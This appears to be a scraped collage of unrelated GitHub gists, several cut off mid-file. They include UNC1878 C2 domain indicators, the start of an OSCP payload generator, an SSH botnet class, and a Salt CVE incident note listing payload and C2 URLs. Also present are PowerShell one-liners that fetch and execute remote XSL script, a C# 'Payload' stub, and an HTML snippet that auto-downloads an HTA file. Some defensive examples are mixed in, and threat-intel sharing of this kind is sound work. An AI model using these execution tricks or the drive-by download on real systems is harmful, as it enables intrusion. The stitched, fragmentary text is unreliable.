@aaronst
aaronst / unc1878_indicators.txt
Created October 28, 2020 20:20
UNC1878 Indicators
# C2 FQDNs
first seen fqdn
2019-12-11 23:37:10 updatemanagir.us
2019-12-20 17:51:05 cmdupdatewin.com
2019-12-26 18:03:27 scrservallinst.info
2020-01-10 00:33:57 winsystemupdate.com
2020-01-11 23:16:41 jomamba.best
2020-01-13 05:13:43 updatewinlsass.com
2020-01-16 11:38:53 winsysteminfo.com
2020-01-20 05:58:17 livecheckpointsrs.com
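The list above is in a two-column "first seen / fqdn" layout. As an added example (not part of the gist), here is a small Python matcher that parses that layout and checks DNS query logs against it. The log lines and the trimmed IOC subset are constructed for the example; the log format "<timestamp> <client> <qname>" is an assumption, so adapt the split for Zeek, Sysmon 22 or whatever resolver log you have. Matching is done on whole labels so that a subdomain of a listed C2 (cdn.cmdupdatewin.com) hits but an unrelated lookalike (notwinsysteminfo.com) does not.

```python
from datetime import datetime

# Constructed IOC list in the gist's "first seen fqdn" layout (a subset of the rows above).
IOC_TEXT = """\
first seen fqdn
2019-12-11 23:37:10 updatemanagir.us
2019-12-20 17:51:05 cmdupdatewin.com
2020-01-10 00:33:57 winsystemupdate.com
2020-01-16 11:38:53 winsysteminfo.com
"""

# Constructed DNS query log: "<timestamp> <client> <qname>" (assumed format).
DNS_LOG = """\
2020-10-28T20:01:02Z 10.0.5.23 www.example.com
2020-10-28T20:01:05Z 10.0.5.23 updatemanagir.us
2020-10-28T20:01:09Z 10.0.7.41 cdn.cmdupdatewin.com.
2020-10-28T20:02:11Z 10.0.7.41 notwinsysteminfo.com
2020-10-28T20:03:30Z 10.0.9.8 winsystemupdate.com
"""


def parse_iocs(text):
    """Return {fqdn: first_seen datetime}; skips the header and comment lines."""
    iocs = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or line.startswith("first seen"):
            continue
        date, time, fqdn = line.split()
        iocs[fqdn.lower().rstrip(".")] = datetime.fromisoformat(f"{date} {time}")
    return iocs


def matching_ioc(qname, iocs):
    """Exact or parent-domain match on label boundaries, never a substring match.

    'cdn.cmdupdatewin.com.' -> 'cmdupdatewin.com'; 'notwinsysteminfo.com' -> None.
    """
    labels = qname.lower().rstrip(".").split(".")
    # Walk from the full name down to the registrable domain; stop before the bare TLD.
    for i in range(len(labels) - 1):
        candidate = ".".join(labels[i:])
        if candidate in iocs:
            return candidate
    return None


def find_hits(log_text, iocs):
    """Return (timestamp, client, qname, matched_ioc) for every log line that hits."""
    hits = []
    for line in log_text.splitlines():
        ts, client, qname = line.split()
        ioc = matching_ioc(qname, iocs)
        if ioc:
            hits.append((ts, client, qname, ioc))
    return hits


if __name__ == "__main__":
    for ts, client, qname, ioc in find_hits(DNS_LOG, parse_iocs(IOC_TEXT)):
        print(f"{ts} {client} queried {qname} (matches C2 {ioc})")
```

The first-seen timestamps are kept so a hit can be compared with the date of the query: a lookup that predates the IOC's first sighting is worth a second look rather than an automatic escalation.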
#!/usr/bin/env bash
# Script to quickly and easily create non-meterpreter payloads for the OSCP
# @m8sec
# Note: It is recommended to create a new directory before running this
# script. All payloads will be placed in the current directory
IP="127.0.0.1" # <YOUR IP HERE>
PORT=443 # You may have to change this if there are outbound restrictions on the target ;)
@reanimat0r
reanimat0r / botnet.py
Created June 19, 2020 21:09 — forked from lava9868/botnet.py
botnet in python
# basic ssh botnet
from pexpect import pxssh  # pxssh is shipped inside the pexpect package


class Client:  # one SSH session to a controlled host
    def __init__(self, host, user, password):
        self.host = host
        self.user = user
        self.password = password
        self.session = self.connect()  # for ssh session

    def connect(self):
        # open the SSH session; a failed login raises pxssh.ExceptionPxssh
        s = pxssh.pxssh()
        s.login(self.host, self.user, self.password)
        return s
@cachedout
cachedout / gist:2950de63aa102ec9ccb895deea1aa539
Created May 4, 2020 09:37
Mirror of Slack CVE discussion
## Overview
What we know so far:
Source: https://github.com/saltstack/salt/issues/57057
Payload distribution point: https://bitbucket.org/samk12dd/git/src/master/ --update: now defunct
Updated payload distrib URL: http://413628.selcdn.ru/cdn/salt-storer
Bootloader distribution link: http://89.223.121.139/sa.sh
backup CNC command source: http://54.36.185.99/c.sh
This is a crypto-mining operation. salt-minions is a compiled xmrig binary (https://github.com/xmrig/xmrig).
salt-store contains a RAT, nspps (https://ironnet.com/blog/malware-analysis-nspps-a-go-rat-backdoor/).
@mgeeky
mgeeky / PowerShell.txt
Created April 30, 2020 21:40
Snippets of PowerShell bypass/evasion/execution techniques that are interesting
##############################################################################
### Powershell Xml/Xsl Assembly "Fetch & Execute"
### [https://twitter.com/bohops/status/966172175555284992]
$s=New-Object System.Xml.Xsl.XsltSettings;$r=New-Object System.Xml.XmlUrlResolver;$s.EnableScript=1;$x=New-Object System.Xml.Xsl.XslCompiledTransform;$x.Load('https://gist.githubusercontent.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/f8245f99992eff00eb5f0d5738dfbf0937daf5e4/xsl-notepad.xsl',$s,$r);$x.Transform('https://gist.githubusercontent.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/f8245f99992eff00eb5f0d5738dfbf0937daf5e4/xsl-notepad.xml','z');del z;
##############################################################################
### Powershell VBScript Assembly SCT "Fetch & Execute"
### [https://twitter.com/bohops/status/965670898379476993]
@gvenk
gvenk / convert-all-youtube-urls-to-nocookie-bookmarklet.js
Last active January 7, 2025 10:58
Convert all youtube urls on a webpage to youtube-nocookie.com urls
javascript:void%20function(){const%20a=document.querySelectorAll(%22a%22);a.forEach(a=%3E{if(-1!==a.href.indexOf(%22youtube.com%22)){const%20b=new%20URL(a.href).searchParams,c=b.get(%22v%22);c%26%26(a.href=%22https://www.youtube-nocookie.com/embed/%22+c)}else-1!==a.href.indexOf(%22youtu.be%22)%26%26(a.href=a.href.replace(%22//youtu.be/%22,%22//www.youtube-nocookie.com/embed/%22))});const%20b=document.querySelectorAll(%22iframe%22);b.forEach(a=%3E{-1===a.src.indexOf(%22//www.youtube.com%22)%3F-1!==a.src.indexOf(%22//youtube.com%22)%26%26(a.src=a.src.replace(%22//youtube.com/%22,%22//www.youtube-nocookie.com/%22)):a.src=a.src.replace(%22//www.youtube.com/%22,%22//www.youtube-nocookie.com/%22)})}();
@gwen001
gwen001 / ejs.sh
Last active July 7, 2024 07:33
onliner to extract endpoints from JS files of a given host
curl -L -k -s https://www.example.com | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?\s*[=:]\s*['\"]?[^'\"]+.js[^'\"> ]*" | awk -F '//' '{if(length($2))print "https://"$2}' | sort -fu | xargs -I '%' sh -c "curl -k -s \"%\" | sed \"s/[;}\)>]/\n/g\" | grep -Po \"(['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})|(\.(get|post|ajax|load)\s*\(\s*['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})\"" | awk -F "['\"]" '{print $2}' | sort -fu
# using linkfinder
function ejs() {
URL=$1;
curl -Lks $URL | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?\s*[=:]\s*['\"]?[^'\"]+.js[^'\"> ]*" | sed -r "s/^src['\"]?[=:]['\"]//g" | awk -v url=$URL '{if(length($1)) if($1 ~/^http/) print $1; else if($1 ~/^\/\//) print "https:"$1; else print url"/"$1}' | sort -fu | xargs -I '%' sh -c "echo \"\n##### %\";wget --no-check-certificate --quiet \"%\"; basename \"%\" | xargs -I \"#\" sh -c 'linkfinder.py -o cli -i #'"
}
# with file download (the new best one):
# but there is a bug if you don't provide a root url
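The one-liner above does three things: pull script src references out of a page, resolve them to absolute URLs, then split each script on ;})> and grep quoted URL-looking strings and .get/.post/.ajax/.load calls. As an added example (not gwen001's code), here is the same pipeline in Python so it can be run and checked offline: the page and scripts are constructed strings standing in for the curl fetches, and urllib.parse.urljoin does the relative-path resolution, which also covers the root-url case the comment above flags. Regexes follow the gist's patterns, including the five-character minimum that drops noise like '//' and '/a'.

```python
import re
from urllib.parse import urljoin

# Constructed sample page and scripts (stand-ins for the live curl fetches).
PAGE_URL = "https://www.example.com/app"
HTML = """
<script src="/static/app.js"></script>
<script src='//cdn.example.net/vendor.min.js?v=3'></script>
<script src="https://www.example.com/js/extra.js"></script>
<img src="/logo.png">
"""
SCRIPTS = {
    "https://www.example.com/static/app.js": r"""
      fetch("https://api.example.com/v1/users");$.get('/api/v1/session');
      var s="\/internal\/admin\/export"; $.ajax("//cdn.example.net/cfg.json");
    """,
    "https://cdn.example.net/vendor.min.js?v=3": "var x='//'; var y='/a';",
    "https://www.example.com/js/extra.js": "axios.post('https://api.example.com/v1/login',{})",
}

# src="..."/src:'...' references ending in .js (optionally with ?query or #fragment)
SRC_RE = re.compile(
    r"""src\s*[=:]\s*['"]?([^'">\s]+\.js(?:[?#][^'">\s]*)?)(?=['">\s]|$)""", re.I)
# quoted absolute, protocol-relative or root-relative URLs of at least 5 chars after the slashes
URL_RE = re.compile(r"""['"]((?:https?:)?/{1,2}[^'">\s]{5,})['"]""")
# the same, but only as the first argument of .get/.post/.ajax/.load(...)
CALL_RE = re.compile(
    r"""\.(?:get|post|ajax|load)\s*\(\s*['"]((?:https?:)?/{1,2}[^'">\s]{5,})['"]""")


def script_urls(html, base):
    """Absolute URLs of every .js src in the page, resolved against the page URL."""
    return sorted({urljoin(base, m.group(1)) for m in SRC_RE.finditer(html)})


def endpoints(js):
    """Candidate endpoints in one script, after undoing JSON-style \\/ escaping."""
    js = js.replace("\\/", "/")
    found = set()
    for chunk in re.split(r"[;})>]", js):  # same split as the sed in the one-liner
        found.update(URL_RE.findall(chunk))
        found.update(CALL_RE.findall(chunk))
    return found


def crawl(page_url, html, fetch):
    """fetch(url) -> script text or None. Returns {script_url: sorted endpoints}."""
    results = {}
    for url in script_urls(html, page_url):
        js = fetch(url)
        if js is not None:
            results[url] = sorted(endpoints(js))
    return results


if __name__ == "__main__":
    for script, eps in crawl(PAGE_URL, HTML, SCRIPTS.get).items():
        print(f"##### {script}")
        for ep in eps:
            print(ep)
```

To run it against a live host, replace SCRIPTS.get with a function that does the HTTP fetch (for example requests.get(url, verify=False).text, mirroring curl -k) and pass the fetched page as html.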
using System;
using System.IO;
using System.Net;
using System.Diagnostics;
using System.IO.Compression;
using System.Runtime.InteropServices;
public class Payload
{
public Payload()
@bmatthewshea
bmatthewshea / geoip2lookup.bash
Last active April 14, 2025 01:46
GeoIP Lookup scripts for use with new Maxmind MMDB database files
#!/bin/bash
#
# By: Brady Shea - 10FEB2020 - Last update 04DEC2023
#
# Usage (ip4 only):
# geoip2lookup IP_ADDRESS
#
# ** Install GeoIP Tool and Updater **
#
# sudo add-apt-repository ppa:maxmind/ppa
<a href="#" id="download">legit</a>
<script>
var element = document.getElementById("download");
element.href = "legit.hta";
element.click();
</script>